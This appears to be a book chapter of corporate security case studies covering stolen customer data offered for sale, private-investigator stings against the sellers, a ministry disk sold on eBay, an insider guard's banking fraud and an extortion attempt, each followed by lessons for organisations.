The message read: Do you want to start your own online services company? - Customer contact list for sale - full details, names, addresses, CC info.

So the head of PR did what he was supposed to do in such cases, and called up the head of security, who was fortunate enough to have held that position only for a couple of months, as he certainly would not have wanted to be held responsible for what must have happened. He lost no time in getting hold of the message and all available details then, without further ado, turned to an investigator for assistance. On the very same day, a team was assembled which consisted of:

o a head of investigation bearing full responsibility for everything that happened as part of the investigation
o a head of operations in charge of all tactical matters, such as carrying out observations and acquiring information
o a quality assurance investigator who would review all documents and provide feedback on all planned steps
o a team with a variable number of members to perform surveillance; in this case, the maximum number of agents used was six
o a lawyer who would provide input on legal matters and on how these could be used should the case go to court.

The team started its work immediately, and the head of security also put his own people to work on some technical aspects, in close co-ordination with the investigation team.

One of the first things they found out was through quite a piece of luck. The original message in the Internet forum contained a link to what seemed to be a project belonging to the writer. They visited the link and took what was a simple step, once they thought of it, namely, looking at the source code of this web page. This revealed something very interesting - a file path containing a name, since the page had obviously been created on Microsoft® Windows® equipment and uploaded from the user's personal profile folder. So there it was: a name.
In parallel, fake negotiations were entered into with the writer who, step by step, revealed more details about himself. The goal of such negotiations is always the same: first, establish as much trust as needed (as fake buyer) to allow you to be the one who calls the shots. Then get the perpetrator to meet in person for a handover of some sample data. Using this sample data, you can find out whether the sale is actually based on real data, pointing to a severe breach, or whether the sale is entirely fake.

Unfortunately, as the victim, you almost always have to take this first step, and spend some money to find out whether or not you are really under threat. There is nothing much else you can do at this stage.
Once it turns out that the data is not fake, you would establish contact with the police, let them take the lead, and work towards some personal handover of the entire dataset, with the police arresting the criminals on handover.
In this case, things turned out to be pretty straightforward. From the fake negotiations and additional research, it became clear that the suspect was living in the country where the company had its headquarters, which would make legal follow-ups a lot easier. The investigation team was able to come up with a name, an address, a photo and a date of birth. The perpetrator was only 14% years old, which made him legally old enough to face criminal proceedings. And on top of it all, when contact was established with the police, it turned out that this child had already had one run-in with the law for fraudulent Internet activity.

The data, however, turned out to be authentic and that was the scary part.
As the case progressed, it turned out that the child was conducting all this activity, using a laptop, from where the family was on holiday in Greece. The investigators now had to find out when they would return, and where they would be coming back to. There were several possibilities, as the parents were divorced and the grandparents ran a small country hotel. This meant that a total of three surveillance teams was needed to locate them correctly.

You can image the surprise of the parents, as they returned from their holiday, and the police, notified by the surveillance team, raided them and impounded all computer hardware that could be found, including the laptop and additional hard disks.
As the child showed some remorse, he agreed to be interviewed with his father present, then reported all the sordid details to the investigators. And here the case ran dry again, as the child was only a dealer, and could not reveal much contact information about those behind the theft.
Legally, the child was only charged with fraud, as he had advertised that he was in possession of millions of customer records while, in fact, he only had about 10,000. He was let off lightly, received a suspended sentence and, as media reports showed some years later, all his later business ideas were legitimate ones.

As for the data theft, that was the tricky bit. Further research showed that the original company had bought another company, in a European country, just a couple of months previously, and that that was where the theft had occurred.
The best explanation they could come up with of what had happened went as follows:
o their new acquisition had wanted to shut down a couple of services and servers, and their idea of shutting down the devices was simply to take them out of DNS, but leave them connected while not doing any further maintenance on them
o over a period of four months, the attacker then successfully exploited an OS vulnerability to run a SQL injection attack and get hold of the customer records
o an estimated 4 million records were lost, including user passwords, but luckily no payment details, such as credit card information.
Naturally, some organisational changes were made to the new subsidiary company, and a tighter hold was exerted on all change management procedures inside that company.

Furthermore, the company had all user passwords changed and, luckily, no abuse was reported by users.
The stolen list, however, is still at large, though it is mostly useless. The physical addresses of the customers from the list were used at least once, when the chief executive of one company received an advertisement from a new and totally unknown competitor, in which his address was spelt exactly as in the company's database, including all spelling mistakes.

This all served as a giant wake-up call about the realities of doing Internet-related business today. The company has not only strengthened its security since then, it has also used this incident to establish standard procedures on how to deal with such cases in the future.

In-depth explanation
The case presented here is quite typical of what can happen to a big corporation. It also highlights the fact that one of the main groups of perpetrators of computer crime today consists of gifted individuals (generally male) aged between 14 and 25, who have nothing better to do with their time. It also shows that companies sometimes make it much too easy for such people to succeed, landing themselves with heavy investigational and recovery costs.

The case shows that a vigilant PR department can be a very good first line of defence in actually detecting a breach. Had it not been for the PR department and its standard routine of reading relevant forums, the breach might have remained unnoticed for much longer. If you belong to a big company, you should adopt this practice, though chances are that your PR department is already doing so.

It is essential that a clear reporting structure exists. It does not have to be fully formalised, though ideally it ought to be. It is absolutely fundamental to information security awareness that people know where to go to report an incident. The head of PR did just the right thing in reporting this incident to the head of security right away, which is the next important thing: report immediately, not as soon as possible.
The investigation team in this case might seem large, but its size and composition are quite typical for such cases. It is appropriate in dimension and scope and will usually only vary in the number of field agents used. Such a team comes at a cost of approximately 10,000 euros per day, but an investigation is characterised by intense phases of activity, followed by phases where nothing needs to be done, so the actual cost will always depend on the intensity of the case and its characteristics. The figure presented is more a rule of thumb.

Quality management is also necessary. Investigations do not forgive mistakes, so having an additional, senior and experienced investigator on board, who provides input on all plans and feedback on all actions taken can be tremendously important. Be aware, though, that these two qualities (senior and experienced) do not necessarily come in one package, and that the person you look for should ideally be in their 50s, having served in progressively more responsible job functions, preferably with an economic crime unit.

In cases like this, the best chance of success always comes from direct contact with the perpetrator. The investigators, therefore, need to be skilled in social engineering and able to take control of the perpetrator and steer them through the proceedings. The younger and less hardened the person is, the more easily this will work, but even hardened criminals have weak spots or vulnerabilities that can be exploited during negotiations, to make them steerable.

It is also important to have all relevant staff needed for the case on heightened alert, and on stand-by if necessary. In this particular case, all data verifications were made at a different site, so the people had to be informed and put on stand-by. This can become more complicated if teams are working across different time zones, though that was not the case here.

Luck was on the side of the company in this case, as the main perpetrator was located in the same country. That simplifies the whole investigation and the case by orders of magnitude as most of our judicial systems have not yet adapted to the scenarios of cybercrime, where national borders do not really have a meaning. In Europe, for example, it will take Europol (the co-ordination office of the EU's police forces) about two weeks to follow up on a case, which is totally useless in relation to the speed with which the perpetrators work. It is, therefore, not in any way sarcastic to state that a good investigation company with an extensive international network will be able to serve you better than the police could.

The root cause of this incident was the acquisition of the other company, coupled with the slightly negligent way in which control was taken over. Of course, all mergers need time for their full potential and their synergies to appear, and this process can take three to five years. Under no circumstances, though, should a security gap of such magnitude be the result of a merger. The company should have exerted tight control over the acquisition's IT processes and enforced this control from Day One of the merger. The buying company was in a better position as regards process maturity, so it was hard to understand why the other company was granted such a long leash.

Lessons learned
As for lessons learned, the company did the best it possibly could to respond to the wake-up call it received. While it was tedious to initiate this investigation, the whole process of dealing with real and potential breaches was revised and brought to a professional level. The case also emphasised how important it was to exert tighter control on the acquired company, and that, too, was swiftly accomplished.
As is typical for larger companies, if they want to learn their lesson, they will, and with the proper drivers in place (in this case the head of security and the COO) changes will be speedily made.

Who wants my data? - a more complicated case
This case happened at the same company as Case 1, some time after that case was concluded. There had been no new breach, but the data was still in the wild and, until you have checked some of the data, you cannot tell whether there is a new breach or not.
At the beginning, this case was much the same as Case 1. This time, someone had approached the call centre of a competitor in Panama to leave a message for the head of marketing and offered to sell data. The head of marketing and the CEO of that company did not want to get involved in that sort of business and, through two middle-men, contacted the company. As contact between the companies was established, the investigators were in close contact with this other company and were even allowed to act under false identities taken from that company.
This time, therefore, the company had a good starting point since many of the procedures they needed to apply had already been field-tested, and close contact had been established with the company to which the data had been offered.

So the investigation team was assembled once again, but it soon became clear that things were going to be a little more complicated this time.
The perpetrator (or at least the vendor) was located in another European country. That made the case infinitely more difficult, as European inter-police co-operation has not been designed to work really fast, particularly not on cases that, although they may harm a company, are not of real public interest. It therefore became clear quite soon that the good police ties which had been established could only be used if, in the course of the investigation, the perpetrator(s) could be lured to the home country and arrested there.

For the moment, however, all communication was based on Internet chats using Skype. This had one big advantage: if you use Skype, all chats (the typed chat, not the telephone conversations) are recorded, and you can save them for later use in court; by installing additional software, you can record telephone conversations as well.

So, negotiations were begun, and dragged on for almost a couple of weeks until a first sample of data was to be made available by the seller. Transfer of this was, however, a problem. The investigators were very keen on not giving up their identity, so they did not want to make any kind of online payment to the seller. The seller wanted, at first, to meet on some remote island in the middle of the Bothnian Sea. They managed to convince him to meet them in another European country, which meant that the investigation team had to fly to that country with only a couple of hours' notice. A price of about EUR 5,000 was agreed, to be handed over in cash and, as preparations were very rushed, the money had to be counted and registered on the plane, which earned them some odd looks from the stewardesses. Registering the money means taking down all the numbers of the notes, so as to be able to identify them later on. In this particular case, it turned out not to be useful, but you can never be sure.
On arrival, one investigator was to meet with the vendor, while the other would try to secretly get a few photos of the perpetrator.

The meeting took place at the airport and, once again, the perpetrator turned out to be a youth, about 20 years old, who had just finished school and was waiting to do his military service. He had already established quite an online contact network, and further traces of the data led to Canada, which made the investigation all the more difficult.

The investigator was, as is standard practice, recording everything that was said and, at one point, the perpetrator said something very important to the whole direction of the investigation. His words were, 'I am doing a lot of business right now, including black business.' That statement would have been worth a great deal in a court of law as it proved something very important: that he knew that his actions were illegal and was determined to carry on. This could gain him a significant prison sentence later on.
Within a short time, an envelope of money was exchanged for a USB stick containing data samples. The readability of the stick was verified on the spot and the parties went their separate ways.

Back at home, a team of four people spent some time analysing the data and they found that, while it was authentic, it was also old, although some records seemed to be brand new. There were only a few of these, though, and they could well have come from other sources, as having affiliates and partners sharing links is very important to raise business in the online world. The youth was by now known to be in contact with such affiliates.

So what was purchased was basically just junk, and did not point at all to a new leak. That was the good news.
Negotiations then dragged on for some time, until it was decided with the customer that the best and most cost-effective move was now to drop the camouflage and give the vendor a choice: co-operate and tell us all you know, or be prosecuted. To this end, an elaborate trap was designed for the youth and his suspected partner (the Canadian) which involved inviting them to come to the home country for a gala where the entire data set would be handed over at a price of one million euros. Since the data had checked out as valid, at least the perpetrators could then be arrested on the spot for fraud.

The trap was never carried out. The following reasons clearly illustrate the intricacies of such investigations.
The police unit, with which an excellent working relationship was established, was unable to assist as the sum involved would automatically require special forces being brought into the picture. The main result of that would have been that the operation would almost certainly not have remained secret. The customer did not want that at all since, even though this was just a follow-up case, it would have been hard to explain to the public.

The customer did not wish to provide the one million euros, for fear that the sum might be lost. The chances of that were absolutely minimal, but one million is quite a bit of money, so the investigating team took the point.

Once the trap had been called off, what remained was the ultimatum already described. This approach usually works when applied to someone who is not a hardened criminal. And it worked in this case, too. The youth's co-operation was secured and he was invited to headquarters for a long talk about the whole case and to tie up the remaining loose ends. To ensure that he did not suddenly drop out of the agreement, (that if he talked, the charges would be dropped) he was picked up in a Northern European country and accompanied to headquarters. Someone even stayed in the same hotel, just to make sure that he would not suddenly decide not to co-operate.

The talk produced good results and some loose ends were fixed. The youth was let off, which led to some dispute within the investigation team, but it was ultimately decided that getting closer to the truth was worth more than could be gained by engaging in an even lengthier investigation including the police forces of several countries; even more so, as no new threat existed.
So, finally, dozens of pages of printed Internet chat, technical evaluations, meeting reports and decisions went, once more, to where they belonged - in the archives.

In-depth explanation
This case does not differ too much from the first one except for one essential difference: the international theatre. As long as everything (the company, the breach, the perpetrator) stays in the same country, dealing with a breach is easy. It is easy to establish contact with the police, to co-operate and to close in on the perpetrator, with the cost being that of the investigations used. In other words, it is controllable and not excessive. But once the national field of action is left and the international theatre needs to be considered, things can become infinitely more complicated, going from having to deal with jurisdictions in which cybercrime simply does not exist, to those countries where corruption is rampant and the system will usually work against you.

In this particular case the following countries were involved:
o Panama: the site where the crime became apparent
o USA: the country where the competing company had its headquarters
o Costa Rica: the country where a trace of the original perpetrator (not the vendor) was leading
o Europe: the location of the victim company
o a different European country: the location of the perpetrator (where he had his permanent address)
o yet another European country: where the first exchange of money against sample data took place.

It is not at all easy to decide where it would make sense to go, where to establish surveillance operations, and so on. Once again, the key in conducting the investigation was social engineering against the perpetrator (or, in this case, the vendor) to gain as much information as possible in order to develop a plausible scenario of the root cause of the breach, and to find substantial evidence to awaken the interest of the authorities. In this case, the fact that the US was remotely involved would have made things easier, as the US, like Britain, is known to follow up thoroughly on cybercrime; but, in the course of the investigation, the idea of filing a criminal complaint in the US was dismissed for purely practical reasons. This also highlights the fact that the legal costs of even evaluating the best way to proceed may outrun the cost of the operational aspects of an investigation. This diverts the whole process into a series of business decisions about cost, thereby shortcutting the investigation.
The reader should also remember that this case was made easier by the fact that it was a sort of follow-up to the first one. This meant that it quite soon became clear, after the first exchange had taken place and data had been evaluated, that the case was not a very serious one. In practice, you will have to treat each alleged or presumed breach with full priority until it is clear whether you have suffered a breach.

It is important to emphasise that whenever negotiations take place you must have a means of recording them. You should use Skype for text chats, as Skype will store chats for at least 30 days. You can also use Skype for telephone chats together with a product called Pamela Call Recorder to record the call. Once you have stored a chat, be sure to save it to some write-protected media, such as a DVD or CD, and protect it with an MD5 hash code, to be able to prove that the recording has not been altered in any way since it was made.

The case also illustrates that, for reasons of cost, private investigations are usually limited in the number of people that can be employed. Going to another country to meet the vendor for the first time, using only two investigators, and having to use inferior mobile recording equipment (due to short notice) was less than optimal. However, if you can make good use of even the worst equipment available, you will still come up with an acceptable result. In this case, the pictures taken were not very good, because nobody could be prepared for the location and circumstances, but the sound recording was excellent which helped a great deal in moving the case along.

The case also shows that companies need a clear guidance if they are inexperienced in investigations. In this case, the investigators were incredibly frustrated when, having set an enormously elaborate trap, which could have helped them arrest the seller and the actual cracker, they finally had to let go of it. However, the company which owns the investigation has the undisputed right to change its directions, however unpleasant this may be. A firm hand is essential in coming up with a strategy and then employing the tactics that have been decided upon. If matters such as a trap need to be discussed, the same firm hand is used when presenting and explaining details of the matter, but it must be prepared to go along with the company's ultimate decision.

Please note that the ultimatum described here only worked because the vendor was not a hardened criminal, and did not want to go to prison. When dealing with organised crime or hardened individuals, it will be much more complicated to achieve success. If organised crime is involved, the police should be brought in anyway, as such cases can turn out to be too hot for even the most experienced private investigators to handle, and the reward is usually not consistent with the level of risk incurred. In the case of the hardened criminal, negotiations will be protracted, and you will need to accept that a much higher level of technical sophistication will be needed to get a firm handle on the perpetrator.
Ideally, an investigation will succeed up to the point where the perpetrator can be delivered to the police, but the police will usually take over at any point if you, as the company, wish them to do so. They will then take the case entirely out of your hands, which may, of course, be an undesired side effect.

Finally, the case illustrates that, as we are all human, sometimes giving somebody, even a perpetrator, a second chance is well worth it. In this case the youth, once he returned from doing his military service, started to work for one of the companies involved and was eager to prove himself, which turned him into a respectable, efficient employee. He has also helped in uncovering a number of other schemes, and has become a valuable asset in these cases. He may not be a Kevin Mitnick - technically, he certainly is not - but sometimes, as a company, you can benefit from bringing souls back on the side of righteousness. You need to be careful when you make this sort of decision, though. If the youth had already had a criminal conviction, then it would not have been prudent to have hired him.

Hard disk for sale - beware of your contractors
This case was a public one, and has been reported in the media. It provides an excellent illustration of some of the more delicate aspects of information security management.
In a certain Ministry of Economics in one European country, everyone was perfectly content. The ministry was in good shape in information security terms and had even implemented some very new methods of securing data. Their paper and disks were shredded when they were no longer needed, and this was all taken care of by a trusted contractor, renowned throughout the country for its trustworthiness.
One day, however, things changed dramatically. Someone, it is not known who, discovered that he could make a very interesting purchase on eBay: a disk, openly advertised as containing data from this Ministry of Economics. The vendor should, of course, have known that this was one sale that would not work out. Instead of selling to some gullible person, the vendor was arrested and the whole thing became public knowledge through the media, which always like a good story.
Ultimately, the contract with the shredding company was terminated and the employee was fired. Peace was restored - or was it?

In-depth explanation
This case illustrates one especially delicate point in information security - how to deal with one's contractors. Even as a really large corporation or, as in this case, a ministry, you will find yourself in a position where you cannot handle all aspects of information security yourself. This applies particularly to recycling and disposing of equipment. Only the military is known to cover these aspects themselves, but we mere mortals usually rely on contractors to perform the job.
This case clearly shows that you can do everything right and still suffer a breach, as the chain of damage will not stop at the contractor itself. The stolen disk and its intended sale directly affected the customer, with the contractor being more of an indirect victim, as it suffered the Ministry's anger and subsequent termination of contract. That termination of contract, however, could not provide an assurance that such a thing would not happen with the next contractor, as the root cause was simply the behaviour of the individual employee. ISO27001 offers a number of essential remedies for this situation.
Your contract with your service provider needs to be as tight as it can be. You should not be afraid to state all expectations in ample detail. A typical ITIL®-based outsourcing contract can easily contain 1,000 pages of stipulations, so a contract on disposal may contain 10 to 20 pages of detailed regulations.
You should reserve the right to audit the contractor and you should make use of that right. You should also be strict in being transparent about its protocol and findings while carrying out the audit. In this way, you will demonstrate to the employees of the contractor that you are serious about your business.
You should define contractual penalties, for the case where deviations from the agreed procedures are found. You do not necessarily have to invoke these, but they should be there to make clear the importance of your message.
Rather unconventionally, you may insist that your contractor perform certain key actions, such as background checking on hires sent to your premises, and frequent changes of personnel.
In the above case, a good process which would have made the breach impossible would have been to have destroyed or damaged the disks before handing them over to the contractor. At its simplest, you can always drill through a hard disk and thereby render it unusable except by highly specialised labs. Physical damage or demagnetisation (degaussing) are essentially the best ways to protect information remaining on a disk. Alternatively, the Ministry could have securely erased all data first, which is certainly an action that could reasonably be expected of them. While secure erasing is very time consuming, it can be done without manual intervention, and only depends on setting up an appropriate 'production line' where computers perform the erasures 24x7.

Unauthorised domain links - it is easy to harm a company's reputation
This case is about a breach, not so much of confidentiality, as of trust. It does, however, illustrate how difficult it can be to remove from the Web material that can damage your reputation; in this case it was not even material, but just a mere link.
Companies who do online business often have very elaborate schemes of affiliation whereby the affiliates can make money or receive other benefits for bringing web traffic and, therefore, customers, to the company. One particular affiliate, however, had a very strange idea about what he could do to raise money.

Let's say the company in question is called This is the link that will pop up on affiliates' websites, with the aim that people get curious about the business and check out the company website. This is what the affiliate did, in a perfectly legal way, and he was actually one of the more successful affiliates in bringing traffic to the company.
One day, however, someone in PR noticed that an Internet domain existed which was called something like Now this website, when surfed to, would immediately redirect people to the company website of In this way, the affiliate could increase his income by directing traffic to the company through his other (legal) links and by getting even those people sceptical of the company to go to the company's website, if they used this defamatory link; quite clever, indeed.

So, once this was known, a single investigator was charged with finding out the identity of this person, and with discovering as much information as was needed to close down the site. The investigation brought to light a number of facts:
o The website itself was hosted in Germany. The German ISP hosting it was quite surprised about the site, but did not want to co-operate without a court order, even for just handing out owner information, which is usually in the public domain, anyway. However, after some robust discussions, they were brought at least to confirming the owner's details, which the investigator had procured through other channels.
o The investigator had been lucky in being able to discover other channels through which information on the domain owner could be obtained. That information was verified several times and was found to be correct and valid.
The case was then handed back to the company and their affiliates department, as they were the best people to make a choice on how to proceed.
In the end, i

t turned out that there was no way to deliver letters to the domain owner, as he was already in prison, serving a sentence for tax fraud. Furthermore, as his legal affiliate activities were bringing in plentiful hits, terminating his contract was not an option the company wanted to follow up.

That domain exists to this day, and maybe the company will have to wait until their affiliate gets out of prison to give him a really good talking to.
The potential legal case here would be based on defamation and on unethical business conduct, as the domain owner would be directly profiting from having people reroute to the company website through the defamatory site.

In-depth explanation
This case does have some funny aspects, as you would rather not suspect your perpetrator to already be in jail. Practically speaking, however, it made dealing with it all the more difficult, as there was simply no means of delivering a legal brief. It could have been managed once it had become clear where this person was imprisoned, but the company didn't want to go to those lengths.

In addition, the entire case came down to quite a difficult business decision, as the domain owner was bringing much desired traffic to the company's site, while, at the same time, abusing that very business model to make an additional profit at the company's expense. So the main decision became whether to sever ties with this person, and they decided not to do so.

The investigation was a milk run, executed by one single investigator who was successful in getting the true identity of the person and in securing enough co-operation from the uncooperative domain provider to verify the results of prior research. The only technical tools used were the standard Microsoft® Windows® and UNIX tools used to get domain name information from the WhoIs service which all Internet service providers use to store domain owner information.

The case, however, illustrates very well how easy it is to harm a company, and how it may not be so easy to define that harm legally, as all it consisted of was the link to the company's website. There was also a risk of going to court without sufficient certainty of conviction and cost recovery.

It needs to be noted that, strictly speaking, the 'breach' (in this case an incident rather than a breach), has not been fully dealt with, neither has it been resolved. It does show, however, what kind of risk-related business decisions can be required from companies whose business exists entirely online.

The trusted guard who was not
This case once more illustrates how important it is:
o to choose one's contractors carefully
o for these contractors to choose their personnel carefully
o to have a secure IT environment.
There is a certain defence sector company which one would expect to take their security extremely seriously, given all the requirements made upon them, largely by the governments who are their main customers. However, even nowadays, it is still a challenge for any company to get the whole chain of trust right, as this case shows.

The company relied on a third-party service provider for guard and gate services to the company's premises, and it was contractually agreed that the guards would change every now and then, usually after about six months. So, in the middle of the year, a new guard was posted to the premises. Had the contracting company run even the most basic criminal background check, they would have noticed that this individual already had one conviction for computer-based fraud. The guard, obviously, did well to hide his true nature and non-job-related talents. For the next couple of months, he served politely and quietly, courteously and charmingly, and it was felt that he was doing the job pretty well.
Unnoticed, however, he began to connect his own laptop to the company network which, frankly, should never have worked in the first place. Exploiting further weaknesses in the IT infrastructure of the company, along with predictable passwords for network equipment, he managed to get access to the CFO's network traffic and, with a little more effort, he discovered a number of online banking IDs, PINs and some transaction numbers that the CFO exchanged with his staff, and which had, therefore, not yet been used.

So, the final act began, and the guard initiated some bank transfers with the stolen data, to several accounts, so that it would not be immediately clear where the payments were going. The payments were substantial, but not really high enough to arouse suspicion.
What did alert the CFO, however, was the fact that these transfers took place on a Friday, and he knew that he never made bank transfers on a Friday. That simple fact ignited the case which was handed over to the police without any further ado. The guard was arrested and convicted once more, the contract with the contractor was terminated and an IT manager was fired. The company had decided on a full clean-up.
Note that what the company did is not to be taken for granted. In a similar case recently, the contracting company offered to pay for the damage, and simply fired the guard without any further criminal proceedings. In that case, it was deemed best to preserve a low public profile, and not to alert the media of anything that could become a good story by reporting the case to the police.

In-depth explanation
This case, once more, highlights the risks inherent in third-party outsourcing, but, in this case, the obvious mistakes and errors made are staggering and blatant.
This is a defence sector company, so security should be at its best, not somewhere between medium and poor. In view of that one fact, the eventual firing of the IT manager was fully justified.
The security company providing the guard made an essential and basically unforgiveable mistake in not checking his background. That was strange, as they would normally have checked. Particularly with customers in this sort of sector, you should not allow the least element of carelessness; there should be absolutely no negligence.

The company made several IT-related mistakes. One was to use easy-to-guess passwords for its network equipment, which enabled the guard to monitor the CFO's network connection, once he had found out which network ports to monitor. The second error was not to monitor usage of administrative commands on its network equipment -which could easily have been done. Thirdly, and most importantly, the guards should never have been able to attach their own equipment to the network - that is just unforgiveable. They should have been provided with company-issued PCs and, yes, it would make sense to allow them to surf the Web, as guard duty can be very boring sometimes, and this would actually help keep spirits and vigilance up, if used responsibly. Furthermore, it is really easy today, with even the most inexpensive network equipment, to configure it in such a way that no other devices than those specified can be attached. That one simple provision could have prevented the entire incident.
The company was simply lucky that the CFO was able to realise so quickly that there had been a breach. Had the guard been more careful, the breach might have remained unnoticed for long enough for him to move to another job.

This case is typical of most breach scenarios, where one essential vulnerability (the actual hiring of the guard based on incomplete information) was aggravated by a company's own shortcomings and resulted in quite a severe incident. Not all incidents can be as easily resolved as this one was.

Insider badmouthing
This next case serves to illustrate the difficulties of investigating company insiders who share their knowledge (or some of it) through online forums.
Take, for instance, an online services company which is also traded on the international stock market. Who knows what about the company's figures, and when, is a matter not to be taken lightly in view of insider trading regulations. Furthermore, the company's reputation is taken very seriously, and some people's only business in the PR department is to monitor relevant online forums for news and reports on the company.
On one occasion, they came across several entries in a stockholder forum where one member was ranting about the company, making defamatory comments, and generally writing very bad things about the company. While this would all come under the freedom of speech regulations (except for the defamatory parts), one sentence alerted the company: 'I know, because I work there.' This set alarm bells ringing, and the PR department notified the head of security who engaged an investigator to find out all there was to discover. The case was not assigned highest priority, though.

As it turns out, the identity of the writer was quite well hidden and no conventional, or even less conventional, means were successful in finding the person. The ultimate option, an elaborate social engineering scheme, by which their trust was to be gained in order to uncover their identity, was not taken, as the cost was deemed excessive given that, although the postings were quite bad, they were just not bad enough to go to court over.

Hence, the case was closed, incomplete as it was, much to the chagrin of the investigator, as investigators do not like unfinished cases. Company policy will, alas, always prevail when it comes to private customers.

In-depth explanation
This case shows that perpetrators can hide quite effectively from a private investigation, but would ultimately not be able to escape the law. While it would be easy for a prosecutor to obtain a search warrant allowing analysis of all systems and traffic to the forum site, the private investigator will either have to rely on superior technical means, shady means or social engineering, to get the information. Sometimes, you simply cannot get the job done, which is just a fact of life for an investigator, though everyone hates to admit it. Furthermore, as the company, your customer, always owns the investigation, their will is your command (as the investigator) and when you are ordered to stop, you do just that, however unwilling you may be.

Technically, this case illustrates that, except for legal stipulations included in contracts, NDAs or acceptable use policies, there is no way to stop an employee from posting his opinion in some online forum. If that employee had crossed the line to exchange insider information in the legal sense of the word, then criminal proceedings would have been unavoidable, but since the case had caused comparatively little harm, the decision ultimately taken by the company becomes understandable; maybe not acceptable, but understandable.

The software vulnerability that was not - a case of blackmail
This case amply illustrates how difficult it has become to resolve today's crime schemes if they are based entirely
on IT. Another company, once again providing online services, would have been perfectly happy just serving its customers, if only the bad guys had left it in peace. Unfortunately, that just didn't happen.

It all started when the company introduced new software for its online services. Some of their software could be used without charge, while some of it needed to be paid for. Now, it turned out that the free software had a bug which a user could take advantage of, and use defraud other users. Since no money was involved, there was, strictly speaking, no damage whatsoever.

However, one clever person discovered the bug and contacted the company about it. That was fine and the company was grateful for the information. When the issue of financial compensation was raised, the company's first reaction was, 'No problem in receiving compensation, just send us an invoice.' For services such as pointing out a software flaw, no one in the business would expect the invoice to amount to more than 2,000 to 3,000 euros.

The finder, however, did not send an invoice. Instead, his line of argument was that the company had made about x million euros that year and he felt that, for pointing out the bug, he deserved a total of 2.5 million euros. That was a pretty impudent demand, given that the bug only affected free software, and the charged-for software did not have the bug. Things started to get worse from there. As the company did not react to that demand, the person stepped things up a little. He now threatened to expose the company via online forums and YouTube if they did not comply with his demands. By doing this, he crossed the line from impudence to extortion.

So the investigators were called in; only a lead investigator and a second investigator this time, as the case was not deemed big enough to require a full team. The perpetrator was from another European country, with a rather weak judicial infrastructure and a different language. The perpetrator was not really able to speak English, which complicated matters quite a bit, as a native language speaker then had to be included in the investigation team. Once that had been done, negotiations were begun, and the perpetrator then posted incriminating videos on YouTube, which meant opening a full criminal case in that country.

So the chief investigator travelled there, established contact with local lawyers and got the proceedings under way. A legal brief was filed with the authorities, outlining and detailing the case, but due to the nature of the country, there was no real hope of any fast action on the part of the legal system.

In the meantime, the investigators, by using local sources, were successful in getting closer to the perpetrator; however, the basic result was that the company he claimed to work for did not exist. It was neither in the UK, where he claimed the headquarters were, nor in his local country. He was using stolen SIM cards to make his calls - it was just not credible that the calls should be coming from a Pakistani illegal immigrant, or from an 80-year-old lady living in the countryside. The identity of the person was still a mystery.

This was to change, quite some time later, as the man established contact with one of the company directors, who had accidentally accepted him as a friend on Facebook. Now a name and a picture were available, although the name did not seem authentic. On the plus side, the lawyers were successful in getting the defamatory videos pulled off YouTube and in having the perpetrator's account suspended. The threat was quite effectively dealt with.

As the company did not react to any of his demands, the perpetrator's will seemed to weaken, but it was revived when the company announced that it was acquiring a similar company in the perpetrator's country. This time, the embarrassing phone calls and blackmailing e-mails were sent to the CEO of the new company as well. However, the investigation teams managed to contain the threat in a joint action, and interest on the perpetrator's part died down again.

As of 2010, the legal case is still continuing and, due to the slowness of the legal system of that country, it is expected to progress for quite some time. However, speedy action on the lawyers' part was, and is, essential to contain the threat and to deal with it appropriately.
It should be mentioned that all proceedings showed clear signs of an amateur, as a professional extortionist would not just let his business die down because the victim did not react. Still, even an amateur was able to give the company a severe headache, given that modern IT technology was available to him and that, as it turned out, you can hide your identity quite effectively for some time in that country.

In-depth explanation
Once again, this case amply illustrates the complexities of international investigations and of perpetrators hiding behind borders and in weak legislations. It is deplorable that, even among European countries and all those who have signed the Convention on Cybercrime, the standards in actually following up on cybercrime differ so much that they can be safely deemed ineffective in some countries.
This particular case also shows how superior a well-functioning private investigation team can be when it has all the right contacts in place. The main aspects of this case are outlined below.

The investigation team consisted of a core team of two people and a local contact co-ordinator who synchronised all local sources of information. This group turned out to be strong enough to establish all basic facts of the case.
Not very long into the investigation, it became clear that the matter should go to court, and a local legal office was contracted to deal with the local authorities and to file a criminal complaint.

In this case, the company had to contact the authorities, in order to be allowed to invoke reasonable self-defence measures, such as initiating an investigation. If they had not notified the authorities, the case could have turned against them in a very ugly way early on or, at the latest, when it eventually reached the courts. It could even have meant that all evidence secured throughout the investigation would be deemed void.
Furthermore, it turned out to be fundamental to the legal proceedings that, in that particular country, blackmailing or extortion were loosely defined, and the terms covered a lot more than would have been the case in the company's home country. This was important to know and a very positive factor, as it allowed prosecution of the perpetrator in his home country, where the case was legally considered to be a strong one. Under the law in its own country, on the other hand, the company could not have claimed to have suffered a case of extortion, as the threat of force was still too indirect.

The speed with which the investigational team was able to provide facts, such as the origins of telephone numbers used, proved very useful in providing big-picture views of the case. Having a native-language speaker on board also proved essential in getting a correct picture of the perpetrator's personality and motives. You should always consider native-language staff on international cases, as they might make all the difference. Your native-language speakers will also, of course, better be able to judge local mentality, which will make all the difference when you need to apply social engineering to steer a perpetrator.

It is astonishing to see how efficient you can be in silencing a threat simply by acting as if you are ignoring it. That worked in this case aided, of course, by the lawyers who quickly got all the defamatory material pulled off YouTube. That material was evidence in establishing the extortion scheme, and it, therefore, had to be preserved carefully, which included storing it on write-once-read-only media and calculating hashes.
The main trick employed here was actually to wear out the perpetrator's willingness to proceed which, again, points to the fact that this was not an habitual criminal, but rather an amateur, although he was fairly professional in hiding his identity.
One tip from the field: if you need to store videos posted on YouTube, you can do so by using a site such as This site allows you to store video from a number of other sites as well, by entering the link to it. Quality may suffer, but at least the evidence is preserved.

Lessons learned
There is, unfortunately, not much to mention in regard to lessons learned, as the company already has a very elaborate process to ensure software quality and software security. However, the investigational process was revised to accommodate those aspects that had arisen from the international nature of this case, especially including native-language speakers in order to be able to communicate, which was the main reason in this case.

Eassos Recovery 4.2.1 - Free as in Freeware - Only Today from Giveaway of the Day Eassos Recovery is professional data recovery software which provides complete soluti...